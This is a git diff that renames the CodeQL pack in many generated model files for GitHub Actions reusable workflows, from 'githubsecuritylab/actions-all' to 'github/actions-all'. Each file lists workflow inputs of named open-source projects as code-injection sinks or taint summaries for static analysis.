b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 964436f33ca..85d150cf11c 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 995940550e1..612a114d79c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 93653f07819..86267e5a921 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 961070778cf..31d0192f3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9f1cc82523c..5116c943f69 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 68babc09b6a..85cb45df895 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index f4271e5424b..4167f4bb982 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index f20f7997d3c..04b9325cecd 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index da5617fd144..60b966d98a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 78821b4dad3..bbca585931c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index f0c9290ca22..a0b7c418967 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 21d23698931..663826781e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index ac38cac602d..c0b8992a678 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a9f87db955e..a7069a8fa4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 99c706b0c28..3ec3c008301 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f8d0172d684..f4c09189ba6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 5afda471f8b..46b715358e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4e5ca50ccec..ca728bfced2 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 02801615bd5..c31b5c8fe0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index d808d612857..e53c0a2780b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index e543dc8b7f3..2c904674125 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index 891d902f470..cff10b709e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 334d64dfbec..31e4dbbf7ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 2c600cd7f7d..5aca8a7070d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index cc6c4e620e6..179c882eba1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index efbf050ddc9..a702bdd4784 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 9860bd3ab92..105a5b49f3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index c160c29f6f6..4e4aa9f7986 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 910715eece0..4272f3376ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] @@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index f04e67670d3..4752bce29b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 3d5fa057987..e493955ca4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 31d0e691e7f..e3c0040f7df 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index 5f9da314f90..daaa34ab8ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 7ae494adb2b..9bfe6180481 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index dce969719d2..d8cd44f08ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index cd5d5ff7d0f..9b1fd73494e 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index fd17e601d80..2fafb1f39b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index bed40dce429..0f4b87acc62 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 62a12e47138..4b58c4a27b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 7491c4f951a..36e6df71d47 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 1876f1146cb..444291b0c50 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 4a8534429f9..ebd11dd1811 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index ecac3f22f85..3dfd3db12f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index ffc4193edbf..a47ce91bf1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index 93b29308ff2..f4114b0a396 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index c5965c5d8ef..a5b367ab355 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 1fc5159e55a..5aab353540a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index bce14a98edd..db6b7c28c51 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git 